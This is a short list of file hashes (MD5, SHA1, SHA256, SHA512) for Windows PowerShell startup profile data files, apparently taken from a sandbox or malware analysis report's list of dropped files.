SHA256 e1af6bff2e0d7eaca0fa3498e2b23f4da02d6d2369c222f2534d186232fb7dbe
SHA512 4aae8eb857e52119c36317ce60159bebc4fc6496bf6b16a0a8eac5bbcefca27070614edef8419aa81bf53acb5370e7487aaae0b7799e6631c2c82b2b980fc6fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8baa55f4c9614712ef2edb673b84f197
SHA1 f95f528a8dbff1c7c8abbc320633ad0ec097c902
SHA256 e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3
SHA512 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b